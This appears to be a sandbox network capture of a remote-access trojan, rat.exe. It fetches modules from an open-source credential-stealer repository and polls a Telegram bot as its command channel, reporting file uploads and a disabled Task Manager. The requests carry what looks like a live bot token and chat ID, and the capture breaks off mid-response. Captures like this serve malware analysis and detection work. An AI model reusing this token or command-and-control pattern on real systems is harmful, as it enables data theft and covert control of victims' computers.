142.250.179.234

content-autofill.googleapis.com

IN A

216.58.201.106

content-autofill.googleapis.com

IN A

172.217.169.74

content-autofill.googleapis.com

IN A

216.58.213.10

content-autofill.googleapis.com

IN A

142.250.180.10

content-autofill.googleapis.com

IN A

142.250.178.10

content-autofill.googleapis.com

IN A

142.250.187.234

content-autofill.googleapis.com

IN A

172.217.16.234

content-autofill.googleapis.com

IN A

172.217.169.10

content-autofill.googleapis.com

IN A

216.58.212.202

content-autofill.googleapis.com

IN A

216.58.212.234

content-autofill.googleapis.com

IN A

142.250.187.202

content-autofill.googleapis.com

IN A

172.217.169.42

content-autofill.googleapis.com

IN A

142.250.200.10

content-autofill.googleapis.com

IN A

142.250.200.42
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A
GET

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D97%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D97%2526e%253D1

chrome.exe

Remote address:

142.250.187.238:443

Request

GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D97%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D97%2526e%253D1 HTTP/2.0
host: clients2.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=SPI9xqYOfFAQB0xp8Nu1GVdoxGZ-yJwXA-QdvcmdqJhZ0jKOk3pbmCkLQ8A2Ekn_ACb0w9Ab17u5y-m-E4JQHiETAyGgAnjsDIJYAOW57Fv_QTnYK68EFxQTRtJSnBr4IMM2mjckVvk6JZ7mP1scO4BPRCUKh2cU887l983c_iX-yEgeaSFsUnN5P8EW-WaHw3s
cookie: AEC=AZ6Zc-XRGzlCK72Zne0mqF-9x0s-kcttFtDsdsCmDRXTBahLugAMZrTYTpo
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
GET

https://clients2.googleusercontent.com/crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/2.0
host: clients2.googleusercontent.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

33.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

33.200.250.142.in-addr.arpa

IN PTR

Response

33.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f11e100net
DNS

raw.githubusercontent.com

rat.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dll

rat.exe

Remote address:

185.199.111.133:443

Request

GET /LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dll HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 61368
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "d33d580aba7cb45483974ba24a8592974d274b0f5735a7e056945e3b58b09a1a"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: F268:176E51:3B5D78:50F977:6783A53D
Accept-Ranges: bytes
Date: Sun, 12 Jan 2025 11:19:26 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600056-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1736680766.343639,VS0,VE160
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: e1f0e6641fc6d00324836cdd4295524bc20e878f
Expires: Sun, 12 Jan 2025 11:24:26 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium.dll

rat.exe

Remote address:

185.199.111.133:443

Request

GET /LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium.dll HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 488888
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "e83bee8c3afe9e780b19482aa94b6ec488f62b7073d2366160a5ccb737bbfcfa"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: E235:210B28:3D30AA:52CC6D:6783A53E
Accept-Ranges: bytes
Date: Sun, 12 Jan 2025 11:19:26 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600056-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1736680767.608000,VS0,VE134
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 894df055bb06be1c3b32575b9f7f90aa51c497c4
Expires: Sun, 12 Jan 2025 11:24:26 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium-64.dll

rat.exe

Remote address:

185.199.111.133:443

Request

GET /LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium-64.dll HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 406968
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "fe8176a7437d01bedeb40863296e8d083c06df2032024b06745768647b339801"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 52D8:1382BC:3F472A:54E2AC:6783A53E
Accept-Ranges: bytes
Date: Sun, 12 Jan 2025 11:19:27 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600056-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1736680767.904005,VS0,VE170
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 33db7f66eeadf4f692ce4ec8554e25a94c0ca58b
Expires: Sun, 12 Jan 2025 11:24:27 GMT
Source-Age: 0
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%93%83%20Uploading%20file...

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%93%83%20Uploading%20file... HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:27 GMT
Content-Type: application/json
Content-Length: 279
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:44 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:45 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:46 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:47 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:48 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:49 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:50 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:51 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:52 GMT
Content-Type: application/json
Content-Length: 383
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%E2%9D%8E%20Taskmanager%20disabled

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%E2%9D%8E%20Taskmanager%20disabled HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:52 GMT
Content-Type: application/json
Content-Length: 276
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:53 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:54 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:55 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:56 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:58 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:59 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:00 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:01 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:02 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:03 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:04 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:05 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:06 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:07 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:08 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:09 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
